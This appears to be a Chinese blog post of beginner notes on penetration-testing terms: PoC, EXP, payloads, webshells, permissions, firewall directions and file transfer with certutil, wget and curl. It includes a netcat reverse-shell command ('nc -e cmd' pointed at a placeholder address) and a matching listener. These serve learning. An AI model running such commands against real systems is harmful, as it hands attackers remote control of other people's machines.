首页 > 其他分享 >渗透基础知识

渗透基础知识

时间:2024-08-28 23:24:55浏览次数:9  
标签:渗透 虚拟机 基础知识 漏洞 Windows EXP Linux 权限

POC:利用/证明代码,发现漏洞     EXP:留下漏洞攻击

木马:留下,操作控制电脑               病毒:破坏性,正常文件无法打开 

payload:有效负载,真正需要执行的代码,管道

PoC通常是无害的,Exp通常是有害的,有了POC,才有EXP。

Payload有很多种,它可以是Shellcode,也可以直接是一段系统命令。同一个Payload可以用于多个漏洞,但每个漏洞都有其自己的EXP,也就是说不存在通用的EXP。

shellcode:payload一种,而exp类似,漏洞

回显

后门 webshell,    反弹:权限转移     黑盒子测试:只有目标

白盒子测试:网站,代码已经知道      跳板:中介

社会工程学:人为的弱点,信任,密码,泄漏的数据库,收集搭建平台,形成社工库,利用漏洞点,搞诈骗一样吸引 

个人计算机:主要是以win10和win7现在出现了win11,那么个人计算机主要是解决自己的日常问题

服务器用机:加设应用和网站  linux系统,Windows2008系统,windows2012,window是2016还要乌班图系统

命令:Windows/Linux(网上查)

文件权限:提高权限,获取更多的资料,删除更改  修改权限:拒绝比同意更优先,用户和组,组管所有的用户,如果要改,组需要改

服务权限:

防火墙:默认自带的防火墙

内网:真正意义上组织:看协议!!!

出战:出去(很宽松)

入站:别人进来(外人连接你)(很严格)

实例:文件上传下载————解决无图形化/数据传输

Windows:powershell  certutil 

Linux:wget +网址:下载文件  curl

反弹shell  --解决数据回显,解决数据通讯

交互式:等待应答,webshell无法交互

虚拟机相当于是内网

内网可以连接到

外网连接不到内网

虚拟机发送权限给这个网址C\nc -e cmd 网址

本机可监听        C:\>nc     - lvvp  5577

权限交换,在电脑上的操作如同在虚拟机上操作

ipconfig  内网

Linux找Windows 入站

正向/反向连接

尽量让别人出来

标签:渗透,虚拟机,基础知识,漏洞,Windows,EXP,Linux,权限
From: https://blog.csdn.net/2301_80014938/article/details/141633387

相关文章

  • 基于源代码泄露安全渗透测试
    基于源代码泄露安全渗透测试   某小型互联网公司,自述公司“专注于互联网领域,在互联网行业经过14年的发展,现已拥有一支强大的专业团队。”但今天我们进行初步web渗透过程,发现存在严重安全漏洞,详细如下一.动态扫描网站入口通过企查查查询该公司基本工商信息,通过官网发现与获取......
  • 系统架构师考试学习笔记第二篇——架构设计专业知识(6)系统工程基础知识
    本章节考点分析:        第6课时主要学习系统工程和系统性能等内容。根据考试大纲,本课时知识点会涉及单项选择题,约占2~5分。本课时内容侧重于概念知识也会有计算题。根据以往全国计算机技术与软件专业技术资格(水平)考试的出题规律,考查的知识点多来源于教材,扩展内容较......
  • 蓝牙基础知识01
     1、蓝牙一种利用低功率无线电,支持设备短距离通信的无线电技术,它工作在全球通用的2.4GHzISM(Industrial(工业),Scientific(科学),Medical(医学))频段,使用IEEE802.11协议。为了对抗工作在2.4GHz频段的WIFI、ZigBee等设备干扰,蓝牙设备采用调频机制。 2、蓝牙协议(两种协议,......
  • 字符串基础知识
    定义字符串对于一个字符串\(S\),\(S\)由\(n\)个字符组成,其中\(n\)是\(S\)的长度,表示为\(|S|\)。子串从一个字符串\(S\)中取出连续的一段\(T\),则\(T\)为\(S\)的子串。子序列从一个字符串\(S\)中顺序取出一些字符,组成的新的字符串就是\(S\)的子序列。前缀......
  • 用例基础知识
    •动态测试(dynamictesting):通过运行软件的组件或系统来测试软件•静态测试(statictesting):对组件的规格说明书进行评审,对静态代码进行走查=》看需求文档就属于静态测试•正式评审(formalreview):对评审过程及需求文档的一种特定评审交叉评审:测试组内测试人员互相评审对方用例......
  • 2.1_3 数据通信基础知识(码元和带宽)
    一、码元    码元是指用一个固定时长的信号波形(数字脉冲),代表不同离散数值的基本波形,是数字通信中数字信号的计量单位,这个时长内的信号称为k进制码元,而该时长称为码元宽度。当码元的离散状态有m个时,此时码元为m进制码元。1码元可以携带多个比特的信息量。二、数字通信系统......
  • makefile基础知识
    makefile知识 1、 Makefile五大内容(显示规则、隐晦规则、变量定义、文件指示、注释)1.1、显示规则:如何生成一个或多个目标文件(要生成的文件,文件依赖的文件,生成命令);stm32:main.ohello.ogcc-ostm32main.ohello.o1.2、隐晦规则:Makefile的自动推导功能,所以隐晦规则可......
  • 深信服安全服务认证工程师(SCSA-S)系列课程——渗透测试环境搭建与工具使用-Nmap
    Nmap简介Nmap是Linux下一款开源免费的网络发现(NetworkDiscovery)和安全审计(SecurityAuditing)工具,软件名字Nmap是NetworkMapper的简称。Nmap最初由Fyodor在1996年开始创建,随后在开源社区众多的志愿者参与下,该工具逐渐成为最为流行的安全必备工具之一。Nmap使用原始......
  • IEC61850教程,第一章:IEC 61850 基础知识介绍
    第一章:IEC61850基础知识介绍平时学习标准或调试IEC61850设备,需要IEC61850模拟器,推荐一款:客户端下载地址:IEC61850客户端模拟器服务端下载地址:IEC61850服务端模拟器什么是IEC61850?IEC61850是定义变电站自动化系统内的设备及其相互作用方式的国际标准。IEC61850的目......
  • JavaSE基础知识分享(十五)
    写在前面今天继续讲Java中的枚举和正则表达式的的知识!这部分说完,JavaSE部分的知识就结束了!枚举概述枚举类用于描述有限个对象的类。自JDK1.5起引入了对枚举类型的原生支持,简化了枚举的定义和使用。下面是JDK1.5之前和之后的枚举类定义方式的比较。JDK1.5之前的写法......